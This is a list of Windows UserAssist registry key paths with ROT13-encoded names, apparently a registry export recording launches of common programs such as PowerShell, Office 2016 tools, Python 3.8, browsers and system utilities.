HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\FuncrPbyyrpgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\GnoGvc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy (k86).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR (k86).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzcbarag Freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzchgre Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Qngn Fbheprf (BQOP).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Rirag Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\vFPFV Vavgvngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Zrzbel Qvntabfgvpf Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cresbeznapr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cevag Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Frphevgl Pbasvthengvba Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Flfgrz Pbasvthengvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf Sverjnyy jvgu Nqinaprq Frphevgl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\NhgbUbgxrl\NhgbUbgxrl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\NhgbUbgxrl\Pbaireg .nux gb .rkr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Obkfgnegre\Obkfgnegre Furyy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Nobhg Wnin.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Purpx Sbe Hcqngrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Pbasvther Wnin.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Perngr Erpbirel Qvfp.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Erzbgr Nffvfgnapr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Qngnonfr Pbzcner 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Bssvpr 2016 Ynathntr Cersreraprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Bssvpr 2016 Hcybnq Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Fxlcr sbe Ohfvarff Erpbeqvat Znantre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Fcernqfurrg Pbzcner 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Gryrzrgel Qnfuobneq sbe Bssvpr 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Gryrzrgel Ybt sbe Bssvpr 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\CbjreFuryy\CbjreFuryy 7-cerivrj (k64).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\VQYR (Clguba 3.8 32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 (32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 Znahnyf (32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 Zbqhyr Qbpf (32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\JvaENE\JvaENE.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\P:\Hfref\hfre\Qrfxgbc\Zvpebfbsg Rqtr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Sversbk.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Tbbtyr Puebzr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Vagrearg Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Zvpebfbsg Rqtr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Zrqvn Cynlre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.Qrsnhyg
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\rkcybere.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnCynlre32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Puebzr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\ZFRqtr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\308046O0NS4N39PO
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.TrggvatFgnegrq
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qvfcynlfjvgpu.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pnyp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.FgvpxlAbgrf
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FavccvatGbby.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfcnvag.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pzq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\kcfepuij.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\abgrcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JSF.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pyrnazte.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ErzbgrQrfxgbc
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zntavsl.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfpbasvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P1P6S8NP-40N3-0S5P-146S-65N9QP70OOO4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\freivprf.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{PQ9RSP53-1NPR-RN00-530N-3RP179Q1971P}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\efgehv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{N3R10OON-P2N1-R0S3-7P97-5Q5521119O40}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\308046O0NS4N39PO;CevingrOebjfvatNHZVQ
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\NccQngn\Ybpny\Zvpebfbsg\BarQevir\BarQevir.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\aneengbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bfx.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\rhqprqvg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\JvaENE\JvaENE.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFNPPRFF.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Npebong Ernqre QP\Ernqre\NpebEq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnPragre
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BARABGR.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BHGYBBX.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.CBJRECAG.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFCHO.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{Q4N262QQ-PR44-Q105-S36O-9Q77N8PO65N4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ylap.rkr.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfNalgvzrHctenqrHV.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\QIQ Znxre\QIQZnxre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\7-Mvc\7mSZ.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\zvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{NN198O3P-PQ8P-7QR1-98Q1-O460S637193O}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ArgCebw.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FbhaqErpbeqre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zboflap.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf AG\Npprffbevrf\jbeqcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{QNN168QR-4306-P8OP-8P11-O596240OQQRQ}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\puneznc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qsethv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P804OON7-SN5S-POS7-8O55-2096R5S972PO}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfvasb32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\cbfgzvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zvtjvm\zvtjvm.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\FuncrPbyyrpgbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\GnoGvc.rkr
